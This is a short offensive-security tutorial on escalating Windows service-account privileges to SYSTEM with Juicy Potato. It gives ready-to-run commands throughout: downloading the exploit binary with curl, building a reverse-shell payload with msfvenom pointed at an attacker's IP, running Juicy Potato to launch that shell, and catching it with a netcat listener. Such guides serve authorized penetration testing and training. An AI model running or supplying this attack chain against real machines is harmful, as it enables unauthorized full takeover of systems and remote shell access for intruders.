Introduction¶
Service accounts are often configured with SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.
These allow an account to impersonate the access tokens of other users, including the SYSTEM user.
Important
Juicy Potato does not work on Windows 10 version 1809 or later, nor on Server 2019.
For Server 2016, Server 2019, and Windows 10 (1607 onwards), use PrintSpoofer.exe instead.
Exploiting privileges with Juicy Potato¶
Rotten Potato was a limited exploit. Juicy Potato improves on it by leveraging more CLSIDs and methods of exploitation.
(The following example uses Windows 7.)
-
Verify that the current user has
SeImpersonatePrivilege:
whoami /priv
-
Download
JuicyPotato.exefrom GitHub:
curl -L -o JuicyPotato.exe https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
Note: This binary is 64-bit. A 32-bit version is available here.
-
Determine the OS version and build:
systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)"
-
Example: Windows 10 Professional, Build 10586 → Version 1511.
Since 1511 < 1809, the machine is potentially vulnerable if not patched.
-
Generate a reverse shell executable using
msfvenom(or usenc.exe):
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ADDRESS] LPORT=1234 -a x64 --platform Windows -f exe -o shell.exe
-
Transfer
JuicyPotato.exeandshell.exeto the target (see File Transfer section for techniques).
-
Test the exploit by redirecting output to a file:
C:\Users\Public\Downloads\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c whoami > C:\Users\Public\Downloads\output.txt" -t *
-
Start a Netcat listener and execute the reverse shell via Juicy Potato:
C:\Users\Public\Downloads\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c C:\Users\Public\Downloads\shell.exe" -t *
-
If successful, you’ll receive a SYSTEM shell on the listener:
sudo rlwrap -cAr nc -lvnp 1234